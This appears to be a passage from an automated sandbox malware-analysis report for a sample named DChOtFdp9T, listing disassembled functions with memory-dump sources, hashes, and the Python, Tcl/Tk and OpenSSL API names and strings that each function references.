                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877067967.00007FFDFF240000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877092897.00007FFDFF2C3000.00000020.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877173635.00007FFDFF2C5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877203803.00007FFDFF2ED000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877227349.00007FFDFF2F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F2000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F8000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF300000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: O_memcmp
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2788248766-0
                                                                                                                                                                                                                            • Opcode ID: 9b4bf22e043f100f45874ea9a8447de73f5f6139368830c5a3450ddeab77ac2f
                                                                                                                                                                                                                            • Instruction ID: 15513b8904969c33f6915c1b6c5f1ebca0e8ed4fac61a7e5c873d5b9d477489a
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9b4bf22e043f100f45874ea9a8447de73f5f6139368830c5a3450ddeab77ac2f
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7DD0A91AF0300282E748B23A8CA25A803C0AB80750FE88034E22DC2AD2DC0CDAA74A00
                                                                                                                                                                                                                            Function 00007FFDFF255F20 Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877067967.00007FFDFF240000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877092897.00007FFDFF2C3000.00000020.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877173635.00007FFDFF2C5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877203803.00007FFDFF2ED000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877227349.00007FFDFF2F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F2000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F8000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF300000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: D_run_once
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1403826838-0
                                                                                                                                                                                                                            • Opcode ID: 9b7345ca23dfe32898bfd37b1440cbbea1254ee4ad9b9421ce13ebf6d84bdc2a
                                                                                                                                                                                                                            • Instruction ID: d8150566ad3ef4f67b11898f68b2d43941c5fb6cf99fbe12d8bd22f396676ebb
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9b7345ca23dfe32898bfd37b1440cbbea1254ee4ad9b9421ce13ebf6d84bdc2a
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BFD05E28F0654386E7086724DC728B023906F40301FC04235D43DC21E9DE1CAA068A00
                                                                                                                                                                                                                            Function 00007FF602995090 Relevance: 157.9, APIs: 44, Strings: 46, Instructions: 364libraryloaderCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,00007FF602995C37,?,00007FF60299308E), ref: 00007FF6029950A0
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,00007FF602995C37,?,00007FF60299308E), ref: 00007FF6029950E1
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,00007FF602995C37,?,00007FF60299308E), ref: 00007FF602995106
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,00007FF602995C37,?,00007FF60299308E), ref: 00007FF60299512B
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,00007FF602995C37,?,00007FF60299308E), ref: 00007FF602995153
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,00007FF602995C37,?,00007FF60299308E), ref: 00007FF60299517B
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,00007FF602995C37,?,00007FF60299308E), ref: 00007FF6029951A3
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,00007FF602995C37,?,00007FF60299308E), ref: 00007FF6029951CB
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,00007FF602995C37,?,00007FF60299308E), ref: 00007FF6029951F3
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875006833.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1874987275.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875032378.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875084625.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: AddressProc
                                                                                                                                                                                                                            • String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyList_Append$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
                                                                                                                                                                                                                            • API String ID: 190572456-2007157414
                                                                                                                                                                                                                            • Opcode ID: 9ce22c7e3f960430e7b86c5184534ff0638df419cfc570d1de65ba3543624de3
                                                                                                                                                                                                                            • Instruction ID: 8d03703544bf227b1785009ca476e9f0aaa7ce48e410fdc29011545e5a774c2b
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9ce22c7e3f960430e7b86c5184534ff0638df419cfc570d1de65ba3543624de3
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3B12B464D0EB0394FA17DB5BA9601B52BA0EF0976CFB51435CC4E822A3EFFCB5589241
                                                                                                                                                                                                                            Function 00007FF602996E40 Relevance: 112.3, APIs: 31, Strings: 33, Instructions: 264libraryloaderCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875006833.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1874987275.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875032378.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875084625.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: AddressProc
                                                                                                                                                                                                                            • String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
                                                                                                                                                                                                                            • API String ID: 190572456-573889970
                                                                                                                                                                                                                            • Opcode ID: da2a48819edd5d87f038863f33265e6f2153e637403049e828f7f12ef4b7c937
                                                                                                                                                                                                                            • Instruction ID: daa8097969e0aeecd5d4266b5331f11b8e067ceaf159f9b0f296e560310d9139
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: da2a48819edd5d87f038863f33265e6f2153e637403049e828f7f12ef4b7c937
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: ABE1F960D1DB0398FA16CB8BA9141B42BA9AF1975CFB40436C84D92367EFFCF568D240
                                                                                                                                                                                                                            Function 00007FFDFF280DB0 Relevance: 66.7, APIs: 28, Strings: 10, Instructions: 218COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877067967.00007FFDFF240000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877092897.00007FFDFF2C3000.00000020.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877173635.00007FFDFF2C5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877203803.00007FFDFF2ED000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877227349.00007FFDFF2F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F2000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F8000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF300000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: R_set_debug$M_construct_octet_string$R_newR_set_errorX_free$D_get0_nameD_get_sizeF_deriveF_fetchF_freeM_construct_endM_construct_intM_construct_utf8_stringX_new
                                                                                                                                                                                                                            • String ID: ..\s\ssl\tls13_enc.c$TLS13-KDF$data$digest$key$label$mode$prefix$tls13 $tls13_hkdf_expand
                                                                                                                                                                                                                            • API String ID: 2131617303-57965188
                                                                                                                                                                                                                            • Opcode ID: b504d739be58bbbb411b299b38167c1e61ab93e670787b231739efea94c42964
                                                                                                                                                                                                                            • Instruction ID: 8ddbbd7955e3d0f2d7fb713e9b321c47f35b5477cb397440dd4c8c3447ff562d
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b504d739be58bbbb411b299b38167c1e61ab93e670787b231739efea94c42964
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CDA1A222B08A8686E715DF64D471AED6720EF95788F449231EE6CD76DAEF3CE181C700
                                                                                                                                                                                                                            Function 00007FFDFF241CB2 Relevance: 57.9, APIs: 31, Strings: 2, Instructions: 147COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877067967.00007FFDFF240000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877092897.00007FFDFF2C3000.00000020.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877173635.00007FFDFF2C5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877203803.00007FFDFF2ED000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877227349.00007FFDFF2F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F2000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F8000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF300000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: X509_X_set0_default$E_freeH_freeM_read_bio_O_freeR_newX509X509_free$E_dupH_newH_retrieveL_sk_new_nullL_sk_pop_freeO_ctrlO_newO_s_fileR_clear_errorR_set_debugR_set_errorX509_get_subject_nameX509_new_ex
                                                                                                                                                                                                                            • String ID: ..\s\ssl\ssl_cert.c$SSL_load_client_CA_file_ex
                                                                                                                                                                                                                            • API String ID: 1433350638-4230349072
                                                                                                                                                                                                                            • Opcode ID: 585c96a69667f732b871924750226f658d6ad0b539c62d838a62c6fe2f00e89e
                                                                                                                                                                                                                            • Instruction ID: 6f653345e3770201f4dbb0ede253791394bea54553dc341334dc7ec143a2e811
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 585c96a69667f732b871924750226f658d6ad0b539c62d838a62c6fe2f00e89e
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 33511E11F0D64249FB59AA52A971EB953519F85BC8F885230EE7DC77CEEE6CE4018700
                                                                                                                                                                                                                            Function 00007FFDFF269C60 Relevance: 45.7, APIs: 23, Strings: 3, Instructions: 167COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877067967.00007FFDFF240000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877092897.00007FFDFF2C3000.00000020.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877173635.00007FFDFF2C5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877203803.00007FFDFF2ED000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877227349.00007FFDFF2F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F2000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F8000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF300000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: R_newR_set_debugR_set_error
                                                                                                                                                                                                                            • String ID: ..\s\ssl\ssl_rsa.c$SSL_CTX_use_certificate$ssl_set_cert
                                                                                                                                                                                                                            • API String ID: 1552677711-1118281239
                                                                                                                                                                                                                            • Opcode ID: 7544aaceb32ee0bc5dd69bbb7bafa26445c341ec586eb0842544501036b3be6a
                                                                                                                                                                                                                            • Instruction ID: c8b779efc21d1669ee3f492c9b3a6ef6beba26cd00508760ec48f6e87d34fb2a
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7544aaceb32ee0bc5dd69bbb7bafa26445c341ec586eb0842544501036b3be6a
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F6617521B1898246EB449B15E461AFD9360EBC97C4F944231EF7DC7BDEEE2CD9418B00
                                                                                                                                                                                                                            Function 00007FFDFF241FA0 Relevance: 36.9, APIs: 19, Strings: 2, Instructions: 111COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877067967.00007FFDFF240000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877092897.00007FFDFF2C3000.00000020.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877173635.00007FFDFF2C5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877203803.00007FFDFF2ED000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877227349.00007FFDFF2F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F2000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F8000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF300000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: R_newR_set_debug$O_ctrlO_freeO_newO_s_fileR_set_errorX509_free
                                                                                                                                                                                                                            • String ID: ..\s\ssl\ssl_rsa.c$SSL_use_certificate_file
                                                                                                                                                                                                                            • API String ID: 2680622528-1790157741
                                                                                                                                                                                                                            • Opcode ID: d7a1691e2fac492bf17abb46e1ceb099bb4e3e491f8d4f7470404fce1e06771c
                                                                                                                                                                                                                            • Instruction ID: 859b79b5b96f0c804201111be864b733f7153dd2fafad56c4608d3584ef671ff
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d7a1691e2fac492bf17abb46e1ceb099bb4e3e491f8d4f7470404fce1e06771c
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B8417C10B0DA8295F714A751E4B1AFD9350AF84794F944232EE7CC76EFEE2DE8458B01
                                                                                                                                                                                                                            Function 00007FFDFF241CC8 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 115COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877067967.00007FFDFF240000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877092897.00007FFDFF2C3000.00000020.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877173635.00007FFDFF2C5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877203803.00007FFDFF2ED000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877227349.00007FFDFF2F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F2000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F8000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF300000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: R_newR_set_debug$R_set_error
                                                                                                                                                                                                                            • String ID: ..\s\ssl\ssl_lib.c$SSL_verify_client_post_handshake
                                                                                                                                                                                                                            • API String ID: 3782669924-2026983811
                                                                                                                                                                                                                            • Opcode ID: 6bdf6b5dbdb5a0212d6a93e2d4bd30b4c78db20cb713def2672b182236102a01
                                                                                                                                                                                                                            • Instruction ID: e3c4224dfa17aa8d187cb7162eaa2931dbacc96f5f575cfc5e0021cafd2d1b9f
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6bdf6b5dbdb5a0212d6a93e2d4bd30b4c78db20cb713def2672b182236102a01
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0E515A20F0D642A6F718A760D4B6BFA53609F85314FA44231DA7DC66EFDE2CAD458701
                                                                                                                                                                                                                            Function 00007FFDFF241DFC Relevance: 31.6, APIs: 16, Strings: 2, Instructions: 96COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877067967.00007FFDFF240000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877092897.00007FFDFF2C3000.00000020.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877173635.00007FFDFF2C5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877203803.00007FFDFF2ED000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877227349.00007FFDFF2F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F2000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F8000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF300000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: R_newR_set_debug$O_ctrlO_freeO_newO_s_fileR_set_error
                                                                                                                                                                                                                            • String ID: ..\s\ssl\ssl_rsa_legacy.c$SSL_use_RSAPrivateKey_file
                                                                                                                                                                                                                            • API String ID: 1899708915-3218138449
                                                                                                                                                                                                                            • Opcode ID: 192f080d8c4ad81c363ef989b50051f967225fcfb2f29f6e7b4e764a7915ceaa
                                                                                                                                                                                                                            • Instruction ID: 8ba55a26d24bedc1b05cc1603e72fd2520b7ca4fb5942d6d23767cee0721cca7
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 192f080d8c4ad81c363ef989b50051f967225fcfb2f29f6e7b4e764a7915ceaa
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 57313810F0EA8245E718B7569871AF99341AF84B80F984231EE7DD7BDFEE2CE9054B41
                                                                                                                                                                                                                            Function 00007FFDFF241041 Relevance: 29.8, APIs: 15, Strings: 2, Instructions: 96COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877067967.00007FFDFF240000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877092897.00007FFDFF2C3000.00000020.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877173635.00007FFDFF2C5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877203803.00007FFDFF2ED000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877227349.00007FFDFF2F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F2000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F8000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF300000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: X509_$E_freeL_sk_set_cmp_func$E_dupL_sk_findL_sk_pushM_read_bio_O_freeR_clear_errorR_newR_set_debugR_set_errorX509X509_freeX509_get_subject_name
                                                                                                                                                                                                                            • String ID: ..\s\ssl\ssl_cert.c$SSL_add_file_cert_subjects_to_stack
                                                                                                                                                                                                                            • API String ID: 3264509243-2950585956
                                                                                                                                                                                                                            • Opcode ID: d6e32d2a87c9bf4bffe58590dd5cd680f2edfc48ac6da9441f9a64b9abbbd7b3
